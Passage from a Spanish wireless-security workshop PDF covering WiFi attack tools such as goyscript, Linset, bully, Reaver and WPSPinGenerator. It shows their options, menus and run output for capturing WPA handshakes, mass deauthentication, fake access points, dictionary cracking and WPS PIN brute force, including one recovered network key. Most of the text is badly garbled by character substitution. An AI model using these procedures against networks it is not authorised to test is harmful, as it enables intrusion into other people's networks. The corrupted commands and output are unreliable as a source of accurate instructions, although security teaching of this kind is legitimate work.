8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 206/260

  -d ash le H#enmk=-r +acket cature le-s /et(!rk %; Hencl!se in u!tes i" %; includes saces=

-2 se "rames 1 and 2 !r 2 and 3 "!r ke, attack Hn!nstrict m!de=

  -c heck "!r valid 4-(a, "ramesC d!es n!t crack-h +rint this hel in"!rmati!n and eit-v +rint verb!se in"!rmati!n Hm!re -v "!r m!re verb!sit,=-) +rint r!#ram versi!n and eit

eapmdhcgen'cript escrito en p+t7on para obtener claves wpa a partir de un 7ands7a/eeap-mdA."as opciones del programa son las siguientes

,nta* ,th!n eamd5hc#en., Tle.caD TleD Tle.ruleDle.ca* ca le (ith ea-md5 handshakele* t! be created (ith hash t! crackle.rule* t! be created (ith hashcat rule 

eml!s* ,th!n eamd5hc#en., .'cature.ca !+(n eamd5rule.rule hashcat --!utle-"!rmat 7 !+(n (!rdlists'r!ck,!u.tt -reamd5.rule 

G9!cript A4/erramienta para obtener 7ands7a/es usando un % also 8%9.

Caracteristicas de la 7erramienta'cript 5ue detecta las redes $ii solicitadas por clientes cercanos. El scriptcrea un % also con el E''I! seleccionado + espera a 5ue el dispositivointente conectarse a dic7o %) obteniendo as2 el 7ands7a/e. cto seguidoejecuta go+script!IC para pasar uno o varios diccionarios al 7ands7a/e paraobtener la clave $%.

&so de la 7erramienta"a abrimos + automaticamente pone la interace en modo monitor + abre otaventana empie3a a escanear las redes usadas por clientes no conectados.

VWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWXY P:?scrit+& 3.4-beta5 b, P:?lms YZWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW[

;istribuci\n de linu detectada* $isla

206

Page 207: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 207/260

 aretas $i&i dis!nibles*

/] %/R&^ ;R%)R &KR%/ WW WWWWWWWW WWWWWW WWWWWWWWWW1= (lan0 ath9k Buanta Micr!s,stemsC %/.

\l! se ha detectad! una tareta $i&i* (lan0

Res!luci\n de antalla actual* 1366768

%niciand! la tareta $i&i...

Reiniciand! la inter"aA (lan0 Hath9k=...

ctivand! m!d! m!nit!r en (lan0 H00*17*4*;3*90*54=...

%/R&^ %+ ;R%)R WWWWWWWW WWWWWWW WWWWWW(lan0 ther!s R9280 ath9k H%);: en m!n0=

VWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWXY Y

Y + :/R:Q +R ;/R YY K_B; ? %:/R YY /: ; : %;s ;;: YY YZWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW[

/] M %/ ` /:MKR ; R;GG GGGGGGGGGGGGGGGGG GGGGG GGGGGGGGGGGGG1= 4*17*&*12*18*K& 15 ^^;880

e dam!s a trlQ ara arar el escane!eleci!nam!s el cliente , emeAara a buscar el handshake

serand! a !btener el handshake... H1 handshake=

VWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWXY P:?scrit;% 3.4-beta5 b, P:?lms YZWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW[

a c!ntrasea de la red ^^;880 n! tiene un atr\n c!n!cid!.

207

Page 208: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 208/260

+ulsa una tecla ara selecci!nar !tr! %;...

G9!cript.4Aerramienta para capturar el 7ands7a/e + obtener claves $% usandodicionarios.

Caracteristicas de la 7erramienta- ,á#ima sencille3 de uso. 'ólo uno o dos pasos=- 'elección de tarjeta $ii 8si sólo tenemos una) se omite la pregunta9<- 'elección del %unto de cceso a atacar.

- ,á#ima eicacia 'e detectan + e#pulsan automáticamente los clientes delpunto de acceso seleccionado con el in de or3ar la obtención del7ands7a/e.- ,á#ima inormación- Inormación del abricante del % en base a su dirección ,C.- En el listado se redes detectadas) se muestran- En morado las redes de las 5ue +a 7emos obtenido la contrasea.- En rojo las redes ocultas.- En naranja las redes cu+o 7ands7a/e +a 7emos obtenido) pero no sucontrasea.- &na almo7adilla a continuación del n:mero de red en la lista) 5ue nos indica5ue dic7a red tiene clientes conectados 8imprescindible para la obtención del7ands7a/e9 - inali3ado el proceso se muestra la duración total del mismo.- !urante la obtención del 7ands7a/e) cuando la captura de pa5uetes pesamás de =00 () 6sta se reinicia) con el in de obtener el 7ands7a/e en unarc7ivo de menos de dic7o tamao + 5ue as2 no ocupe muc7o espacio.- 1ras la obtención de 7ands7a/e) se comprueba si es posible la obtenciónde la contrasea con un diccionario espec2ico 81ele<9. 'i no es posible) se

intenta buscar utili3ando los diccionarios gen6ricos 8todos los 5ue est6n en lacarpeta @dic@ + cu+o nombre empiece por @generico.@9- ,á#ima comodidad "a contrasea obtenida se guarda automáticamente enun arc7ivo de te#to con el nombre del punto de acceso + su dirección ,C.

&so de la 7erramienta l iniciar la 7erramienta automaticamente pone la interace en modo monitor + abre ota ventana con airodump-ng 5ue empie3a a escanear las redes con$pa.

208

Page 209: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 209/260

%ara parar el escaneo pulsamos Crtl h C + nos mostrara la lista de redesdisponible.

/] M / %) ` %+: $+ /:MKR ; R; WW WWWWWWWWWWWWWWWWW WWWWW WW WWWWW WWWW WWW

1=< 98*&5*37*7;*4*66 6 - 11 $+ m!vistar66

2=< 0*4*00*76*74*61 2 - 11 $+2 ^^-$M3= 8*0*3*2K*12*71 11 - 11 $+ % $/2254= 62*6K*;3*6*86*00 10 - 12 $+ %< v!da"!ne86025= 8*0*3*25**KK 6 - 12 $+ % $/KK6= 8*0*3*27*7*93 6 - 12 $+ % $/7937= 00*24*6*K*8*0 6 - 13 $+2 T :culta D8= 9*80*;&*0;*5*1K 11 11 13 $+2 % :ran#e-5199= 00*24*6*K*8*2 6 - 14 $+2 $/060

10= 08*7*4*6*65*K 7 - 14 L$+ 2014 $%&%11= 68*K6*&*0*4;*8 8 - 14 $+2 %L

12= &8*1K*&*62*7*37 11 - 14 $+ % M:)%R7213= 4*1*46*71*56*9 11 - 15 $+ % )!da"!ne56814= 8*94*&6*4K*79*20 9 - 19 $+2 % :&%+15= 38*72*0*9*&1*7 1 - 20 L$+ ^^&1716= 90*&6*52*20*4&*79 1 - 20 $+ ^^&1717=< 0*91*53*24*9*;K 1 19 24 L$+ $/3;18= 64*66*K3*;;*78*2 1 - 24 $+2 +-%/;;78219= 72*0*6&*43*0*70 6 - 25 $+ %< v!da"!ne07020=< 62*96*K&*6;*7*4 1 1 28 $+ v!da"!ne7421=< &8*8*85*88*15*;K 11 3 28 $+ ^^15;;22= K*14*01*KK*;5*;8 11 - 35 $+2 % Ri!+euen!

'elecionamos la red objetivo + el ata5ue.

Cuando elijamos la nuestra) comen3ara el ata5ue de desautentiicación paracapturar automáticamente el 7ands7a/e. Cuando lo consiga pasaraautomáticamente aircrac/-ng con D diccionarios 5ue tiene +a cargados.En caso de 5ue seleccionemos una red de la 5ue +a tengamos un7ands7a/e guardado) pasara a aircrac/-ng automáticamente.

Bideotutorial 7ttp??+outu.be?mF-D&5#KIA; 

G9!e!ionerramienta 5ue crea el ic7ero 'esiones-*o+ilms.#3m en el escritorio.Este arc7ivo contiene las sesiones de las 7erramientas *o+ilms dentro deun modulo de para sistemas 'la#.!espues de crearlo nos avisa para 5ue lo guardemos en la carpeta,odules ?mnt?sdb=?wiisla#?modules?!onde sdb= es el pendrive usb donde tenemos $iisla#Esto es mu+ util +a 5ue cuando iniciamos de nuevo $iisla# en modo livecargara las sesiones de *o+ilms con las 5ue estabamos trabajando.

209

Page 210: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 210/260

Genpm7erramienta oara reali3ar ata5ues de precomputaciona a claves $%-%'"as opciones son#enmk* Must seci", a dicti!nar, le (ith -"

sa#e* #enmk F!ti!nsN-" ;icti!nar, le-d :utut hash le-s /et(!rk %;-h +rint this hel in"!rmati!n and eit-v +rint verb!se in"!rmati!n Hm!re -v "!r m!re verb!sit,=-) +rint r!#ram versi!n and eit

"ter rec!mutin# the hash leC run c!(att, (ith the -d

ar#ument.

1and!ha7ererramienta para obtener los 7ands7a/es de redes con encriptación $%.

VWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWXY Kienvenid! a andshaker v1.1 b, !eman76 YZWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW[

e han detectad! las si#uientes inter"aces *

 WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW1= (lan0 ther!s

 WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW

elecci!na una %nter"aA* 1

 WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWctivand! (lan0 en m!d! m!nit!r

 WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW%niciand! escane! de redes...trl Q detiene el r!ces!

 WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW

! rimer! ue tenem!s ue hacer es seleci!nar la inter"aA.ue#! el r!#rama la !ne en m!d! m!nit!r , escanea las redes.uand! escane! la red ue uerem!s atacar le dam!s a trl Q , laseleci!nam!s ara caturar el handshake.

 aAAtel $+

erramienta ara !tener la clave $+ de redes del ti! aAAtel

210

Page 211: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 211/260

! ue aarece al inicar la herramienta es l! si#uiente* aAAtel $+ bash t!P! ut!r K,* 1camar!n1 ara el "!r!*htt*''lami(eb.c!m'D /! eiste /in#una sesi!n +revia... endras ue %niciar unaD Reanudar esi!n s'n* n

!en "ailed* /! such le !r direct!r,

---------------------------------------------------------------------------------------K%; %; ncr,ti!n

---------------------------------------------------------------------------------------ui n! m!strara la macC n!mbre de red , encritaci\n de l!s unt!s

de acces!.---------------------------------------------------------------------------------------

D elecci!na el rchiv! .ca* aAAtel(a.ca Haui !ndrem!s el archiv! decatura de la red del ti! aAAtel=

Lin!eterramienta para crac/ear redes $%<"o 5ue aparece al iniciar el programa

%/ 0.12 Hrev. 31= b, vk496+ara se#uridad(ireless.net 

atest rev. FJN

<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< << %/ 0.12 b, vk496 << inset %s /!t a !cial n#inerin# !!l << <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< ut!detectand! Res!luci\n...1366768

elecci!na una inter"ace*

1= (lan0<J 1

%:/ /

1= !d!s l!s canales2= analHes= esecEc!Hs=

211

Page 212: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 212/260

  <D 1

h!ra emeAara a escanear redes en l!s canales indicad!s.e dam!s a trlQ ara arar , n!s aarecera la si#uiente antalla araseleci!nar el !betiv!*

istad! de +s :betiv!

< M / +$R %;

1= 28*6*8*8*09*02 6 $+ 14 B/%2= &8*63*94*0*82*9 4 $+ 11 M:)%R8203= ;8*5;*4*;7*40*88 4 $+2 15 am3a

HL= Red c!n lientes

elecci!na :betiv!<D 1

na veA seleci!nad! el !betiv! n!s sale esta antalla

%/&: + :K%):

%; G M:)%R820 ' $+anal G 4

)el!cidad G 54 MbsM del + G &8*63*94*0*82*9 H=

M:;: ; &ake+

1= !stad HRec!mendad!=2= airbase-n# H!nei!n mas lenta=3= alir

<D 1eleci!nam!s el m!d! ue uerem!s ara crear el unt! de aces! "als!H&ake+=

+RR /; ; %/

1= RealiAar desaut. masiva al + !betiv!2= RealiAar desaut. masiva al + Hmdk3=3= RealiAar desaut. esecica al + !betiv!4= )!lver a escanear las redes5= alir

<D 1eleci!nam!s c!m! uerem!s hacer la desautenticaci!n ara caturar el

handhsake

212

Page 213: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 213/260

e n!s abriran 2 ventanasC una de catura , !tra de desautenticaci!n.ue#! en la ventana rincial n!s aarecera esta antalla*

I +Rw el /;J

1= i2= /! HlanAar ataue de nuev!=3= /! Hselecci!nar !tr! ataue=4= elecci!nar !tra red5= alir<D

9no Netgear .pa* 1ac7erramienta para 7ac/ear redes ono con router Netgear + encriptación$pa<.

Cuando iniciamos el programa aparece:n! /et#ear $a2 ack v3.1 -b, !eman76- -(((.lami(eb.c!m- H2014='' %ntr!duce un handshake en "!rmat! .ca en la careta :n!-/et#ear ''

1al + como indica tenemos 5ue poner arc7ivo .cap con el 7ands7a/e en lacarpeta ?opt?>N>TNetgearT$%<Tac/? 

4riterramienta para obtener claves $% a partir de 7ands7a/es capturados.Cuando iniciamos el programa aparece

  T ' ' '

'

+,rit 0.4.1-dev H= 2008-2013ukas ue# htt*'',rit.#!!#lec!de.c!m 

 his c!de is distributed under the P/ Peneral +ublic icense v3Q

sa#e* ,rit -h "!r see all !ti!nss! * ,rit -h ara ver t!das las !ci!nes

+ara ver t!das las !ci!nes usam!s el c!mand! ue n!s indica

(isla x < ,rit -h+,rit 0.4.1-dev H= 2008-2011 ukas ue# htt*'',rit.#!!#lec!de.c!m 

 his c!de is distributed under the P/ Peneral +ublic icense v3Q

sa#e* ,rit F!ti!nsN c!mmand

213

Page 214: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 214/260

Page 215: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 215/260

En el video Bive/ e#plica cómo unciona lo de cirado 5ue un cliente estábuscando en una determinada red mediante la creación de cuatro puntos deacceso alsos) cada uno con un dierente tipo de encriptación) Ninguna) $E%)$% + $%< + el ver em cuál de los cuatro el cliente se conecta.

e tenido resultados mi#tos con esto) sobre todo para dierenciar entre $%+ $%<) sino como una idea 5ue es sólido + unciona una parte del tiempopor lo 5ue es) sin duda vale la pena probar.

En el caso de $%?$%<) el script ejecuta airodump-ng junto para la capturade los dos primeros pa5uetes del 7ands7a/e + as2 puede intentar descirar laclave) +a sea con aircrac/-ng o co$%tt+ u otra erramienta para usar ata5ues de diccionario contra $%.

"o 5ue 7ace este script es automati3ar todo el proceso de coniguraciónEl script crea cinco interaces en modo monitor) cuatro se utili3an comopuntos de acceso + el 5uinto se utili3a para airodump-ng. %ara acilitar lascosas) en ve3 de tener cinco ventanas todo esto se 7ace en una ventana desesión 5ue permite cambiar entre las pantallas para ver lo 5ue está pasando.1odas las sesiones están eti5uetados para 5ue usted sepa cuál es cuál.

 l inicar el programma nos aparece

sa#e* '!t'(ih!ne,'(ih!ne,.sh TessidD TchannelD Tinter"aceD;e"ault channel is 1

;e"ault inter"ace is (lan0R!bin $!!d Tr!binUdi#inina.!r#Dee ecurit, ube $i Me#a +rimer eis!de 26 "!r m!re in"!rmati!n 

%ara usarlo recomiendo ejecutar antes *>Yscript % 5ue nos escanearalos clientes cercanos + las redes a las 5ue se conectan.&na ve3 escaneados ejecutaremos wiiT7one+.s7 poniendo en essid elnombre de una de las redes a la 5ue se conecta alguno de los clientesescaneados.Crearemos asi un punto de acceso con ese nombre de red a la 5ue intentaraconectarse el cliente + con airodump capturaremos el 7ands7a/e.

.i$ica7engerramienta mu+ completa de wardriving 5ue a su ve3 usa distintos scripts +7erramientas como aircrac/) p+rit) m+s5l) etc

 l abrirla nos aparece las siguientes pestaa'tatsBentana con las estadisticas de las redes wii.

215

Page 216: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 216/260

C,N*

$!'Q"$ardriving 'Q".

erramienta 'Q" para crear bases de datos de passwords.

216

Page 217: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 217/260

%+riterramienta para obtener la clave wpa a partir del arc7ivo con el 7ands7a/ecapturado.

Cubrimos los apartados + le damos a 'tartInject

217

Page 218: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 218/260

'i le damos a Client?utenticate?sociate nos abrira una ventana de airepla+para la injección de pa5uetes.'i le damos a $iiapP ,ass desaut7entication 7ara una desautenticaciónmasiva de todos los clientes.Conig

218

Page 219: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 219/260

 %ara establecer los parametros de coniguración'elect a ile arc7ivo de captura con 7ands7a/e!evide wlan0

ill device mon0(''I! "oc/ mac objetivoC7annel "oc/ canal de la mac objetivo'i le damos al botón 'can start empe3ara a escanear las redes wiis.

Report

Nos da la opción de guardar el reporte de nuestros ata5ues en pd) t#t o 7tml.

219

Page 220: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 220/260

Page 221: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 221/260

"e damos a @Ejecutar ircrac/H

.4Serramientas para atacar redes wpa con $%' activado.

$%' son las siglas de $ireless %rotected 'etup.Es un sistema 5ue suelen tener activado por deecto la ma+or2a de puntos deacceso actuales.Consiste en una a+uda para la coniguración del cliente de < ormas.=.-%ulsando un botón del punto de acceso se pueden conectar automaticamente los clientes sin necesidad de introducir la clave.<.-&sando un pin se pueden conectar los clientes.Bamos distintas 7erramientas para obtener claves de puntos de acceso conencriptación $% + el sistema $%' activado.

El procedimiento es primero obtener el pin en unción de los posibles pinsseg:n el modelo del punto de acceso o por uer3a bruta.&na ve3 obtenido el pin $%' las 7erramientas obtendran la clave $%.

Bull'cript con multitud de opciones para crac/ear redes con $%' activado.

 lguna de las opciones son

bull, T!ti!nsD inter"ace

Reuired ar#uments*inter"ace * $ireless inter"ace in m!nit!r m!de Hr!!t reuired=-bC --bssid macaddr * M address !" the tar#et access !int

:r-eC --essid strin# * tended %; "!r the access !int

:ti!nal ar#uments*-cC --channel /FC/...N * hannel number !" +C !r list t! h! Fb'#N-iC --inde / * tartin# in inde H7 !r 8 di#its= Fut!N-lC --l!ck(ait / * ec!nds t! (ait i" the + l!cks $+ F43N

-!C --!utle le * :utut le "!r messa#es Fstd!utN-C --in / * tartin# in number H7 !r 8 di#its= Fut!N-sC --s!urce macaddr * !urce Hhard(are= M address F+r!beN-vC --verb!sit, / * )erb!sit, level 1-3C 1 is uietest F3N-(C --(!rkdir ath * !cati!n !" in'sessi!n les Fx'.bull,'N-5C --5#hA * ! !n 5PA a'n de"ault channel list F/!N-KC --brute"!rce * Krute"!rce the $+ in checksum di#it F/!N-&C --"!rce * &!rce c!ntinue in site !" (arnin#s F/!N-C --seuential * euential ins Hd! n!t rand!miAe= F/!N-C --test * est m!de Hd! n!t inect an, ackets= F/!N

dvanced ar#uments*

221

Page 222: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 222/260

  -aC --acktime / * ;erecated'i#n!red Fut!N-rC --retries / * Resend ackets / times (hen n!t acked F2N-mC --m13time / * ;erecated'i#n!red Fut!N-tC --time!ut / * ;erecated'i#n!red Fut!N

-1C --in1dela, MC/ * ;ela, M sec!nds ever, /th nack at M5 F0C1N-2C --in2dela, MC/ * ;ela, M sec!nds ever, /th nack at M7 F5C1N-C --n!acks * ;isable check "!r sent ackets F/!N-C --n!check * ki R'& validati!n Her"!rmance= F/!N-;C --detectl!ck * ;etect $+ l!ck!uts unre!rted b, + F/!N-C --ea"ail * + &ailure terminate ever, echan#e F/!N-C --l!cki#n!re * %#n!re $+ l!cks re!rted b, the + F/!N-MC --m57nack * M5'M7 time!uts treated as $/@s F/!N-/C --n!"cs * +ackets d!n@t c!ntain the & eld Fut!N-+C --r!be * se r!be reuest "!r n!nbeac!nin# + F/!N-RC --radi!ta * ssume radi!ta headers are resent Fut!N-$C --(ind!(s7 * Masuerade as a $ind!(s 7 re#istrar F/!N-^C --suress * uress acket thr!ttlin# al#!rithm F/!N-)C --versi!n * +rint versi!n in"! and eit-hC --hel * ;isla, this hel in"!rmati!n

Bull.4Sdialogerramienta igual 5ue la anterior para crac/ear redes con $%' pero conmenus para acilitar su uso.

222

Page 223: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 223/260

Bullcio!oerramienta con menu gráico para crac/ear redes con $%'.%rimero el programa nos pregunta 5ue interace usar wlan0El tiempo para escanear en segundos D0

"uego empe3ara a escanear buscando redes con $%' activado.&na ve3 selecionamos el objetivo le damos a 'i + empe3ara el ata5ue al$%' con (ull+.

G9Script.4Serramienta 5ue busca + crac/ea redes con $%' activado.

Caracteristicas de la 7errramienta- ,á#ima sencille3 de uso. 'ólo uno o dos pasos=- 'elección de tarjeta $ii 8si sólo tenermos una) se omite la pregunta9<- 'elección del %unto de cceso a atacar.- ,á#ima eicacia 1ras seleccionar el %unto de cceso) se comprueba si6ste es susceptible de un ata5ue rápido. %rimero se mira si está en la base

de datos de pins conocidos para esa ,C +) si no es el caso) se genera unprimer pin usando el algoritmo del $%'%in*enerator,>!. 'i ninguno de losdos casos es posible) se eect:a un ata5ue por uer3a bruta estándar.,á#ima inormación- Inormación del abricante del % en base a su dirección ,C.En el listado se redes detectadas) se muestran- En morado las redes de las 5ue +a 7emos obtenido la contrasea.- En rojo las redes blo5ueadas.- En naranja las redes 5ue 7emos atacado anteriormente sin obtener sucontrasea 8sesión guardada9

223

Page 224: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 224/260

Page 225: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 225/260

3283 (asulicant%/R&^ %+ ;R%)R

 WWWWWWWW WWWWWWW WWWWWW(lan0 ther!s R9280 ath9k H%);: en m!n0=

VWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWXY YY + :/R:Q +R ;/R YY K_B; ? %:/R YY / ; R; ;; YY YZWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW[

??automáticamente lan3a $as7 para escanear las redes con wps

Kuscand! redes c!n $+ activad!...na veA escanee las redes ue uerem!s le dam!s a trlQ

/] M / %) ` %+: $+ /:MKR ; R; WW WWWWWWWWWWWWWWWWW WWWWW WW WWWWW WWWW WWW1= 8*0*3*2K*12*71 11 - 11 $+ % $/2252= 62*6K*;3*6*86*00 10 - 12 $+ %< v!da"!ne86023= 8*0*3*25**KK 6 - 12 $+ % $/KK 

4= 8*0*3*27*7*93 6 - 12 $+ % $/793 5= 9*80*;&*0;*5*1K 11 - 13 $+2 % :ran#e-5196= 68*K6*&*0*4;*8 8 - 14 $+2 %L 7= &8*1K*&*62*7*37 11 - 14 $+ % M:)%R728= 4*1*46*71*56*9 11 - 15 $+ % )!da"!ne5689= 8*94*&6*4K*79*20 9 - 19 $+2 % :&%+

10= 72*0*6&*43*0*70 6 - 25 $+ %< v!da"!ne07011= K*14*01*KK*;5*;8 11 - 35 $+2 % Ri!+euen!

Como vimos en el listado de redes detectadas) se muestran

- En morado las redes de las 5ue +a 7emos obtenido la contrasea.- En rojo las redes blo5ueadas.- En naranja las redes 5ue 7emos atacado anteriormente sin obtener sucontrasea 8sesión guardada9- &na asterisco 89 a continuación del n:mero de red en la lista) 5ue nosindica 5ue la ,C de dic7a red está en la base de datos de pins conocidos.- &na almo7adilla 89 a continuación del n:mero de red en la lista) 5ue nosindica 5ue la ,C de dic7a red está soportada por el algoritmo de$%'%in*enerator,>!. 

225

Page 226: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 226/260

seleci!nam!s la red ue uerem!s auditar , n!s aarecera l! si#uienteas selecci!nad! una red c!n $+ activad!.IBu mt!d! deseas ara la audit!rEaJ

1= #!,scrit$+

2= #!,scrit$+

elecci!na un mt!d!* 2 H#!,scrit$+=

R M / WWWWWWWWWWWWW

%/R&^*/!mbre..........* (lan0M!d! m!nit!r....* m!n0M.............* 00*17*4*;3*90*54&abricante......* Buanta Micr!s,stemsC %/.

+/: ; :*/!mbre..........* v!da"!ne070M.............* 72*0*6&*43*0*70anal...........* 6ncritaci\n....* $+-M+ H$+ activad!=&abricante......* T desc!n!cid! D

VWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWX

Y P:?scrit$+ 3.4-beta5 b, P:?lms YZWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW[

tacand! la red v!da"!ne070...

%niciand! ataues c!n in esecEc!...

+r!band! in 43946082 #enerad! !r $++inPenerat!rM:;... +%/:RR:

fff :/R` /:/R; OOO

+in $+.....* @43946082@lave $+...* @6+B+/&M;?;M@

!ntrasea #uardada en el archiv!gv!da"!ne070 H72-0-6&-43-0-70=.ttgdentr! de la careta gclavesg

;uraci\n del r!ces!...* 13 se#und!s

IBuieres c!nectarte a la red gv!da"!ne070gJ F'/N*

226

Page 227: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 227/260

Bideotutorial7ttp??+outu.be?o;BAA'-*/EI 

G9!e!ion 

erramienta 5ue crea el ic7ero 'esiones-*o+ilms.#3m en el escritorio.Este arc7ivo contiene las sesiones de las 7erramientas *o+ilms dentro deun modulo de para sistemas 'la#.!espues de crearlo nos avisa para 5ue lo guardemos en la carpeta ,odules.Esto es mu+ util +a 5ue cuando iniciamos de nuevo $iisla# en modo livecargara las sesiones de *o+ilms con las 5ue estabamos trabajando.

In$latorerramienta para crac/ear redes con $%' activado.En la primera pantalla aparece

%or avor no crac/ees %untos de ceso e#cepto el tu+o."e damos a +es."uego nos aparece otra pantalla

'elecionamos nuestro interace + le damos a Ne#t.En la siguiente pantalla

227

Page 228: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 228/260

le damos al botón 'can para escanear redes con wps activado.&na ve3 apare3can acabe el escaneo selecionamos la red objetivo + ledamos a ne#t.

228

Page 229: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 229/260

 7ora selecionamos las opciones para el ata5ue al pin $%' + le damos albotón Run.Nos abrira una ventana de reaver 5ue probara los pins 7asta 5ue encuentreel correcto + una ve3 lo encuentre nos dara la clave $%.

=t#p!pinerramienta con interace gráica 8*&I9 5ue calcula el posible %in $%' por deecto del punto de acceso + una ve3 lo obtiene nos da la clave $%.%ara el cálculo de %IN usa compute%in de 7aoC7uns7eng 8www.i(eini.com9&na ve3 entramos en el programa) vamos a interace + le damos a ctivar para poner nuestra interace en modo monitor."uego en la ventana principal"e damos a scan para escanear las redes con wps activado.&na ve3 apare3can las redes.

'elecionamos la 5ue 5ueramos + le damos a @Calcular %IN@.

229

Page 230: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 230/260

'i 5ueremos probar si el pin calculado unciona le damos a @Reaver 1est%IN@Iniciara Reaver + testeara el pin calculado.'i 5ueremos probar todos los pins le damos a @Reaver@En la parte de abajo 7a+ una parte 5ue pone Cálculo !irecto+'i metemos una mac 5ue tengamos guardada + le damos a @Calcular@ noscalculara el pin del punto de acceso'i le damos a Reaver podemos conigurar sus opciones.

'i le damos a $as7 podemos conigurar sus opciones.

Rea@er ,+;erramienta para atacar por uer3a bruta redes con $%' activado."o 5ue 7ace es probar uno por un todos los pines posibles en % objetivo)para 5ue una ve3 conseguido el aut6ntico poder obtener la clave $%.El proceso es por uer3a bruta + puede tardar entre + <47 en obtener el pincorrecto + la clave wpa dependiendo del n:mero de pines a probar + ladistancia al % objetivo.%uede 5ue el router se GdeiendaH blo5ueando temporalmente de manerapermanente el acceso por pin) despu6s de uno numero predeterminado depines erroneos ) con lo 5ue el proceso se alargara o en el peor de los casosno tendrá un inal positivo."a 7erramienta lo 5ue 7ace es probar todas las combinaciones posibles delos 4 primeros d2gitos del pin + una ve3 comprobado 5ue son correctos) nosreportara un , + automáticamente el proceso pasara al F0 para seguir probando los D siguientes + por :ltimo el c7ec/sum 8 ultimo digito9.Cuando los ; son correctos nos mostrara en pantalla la clave $%.

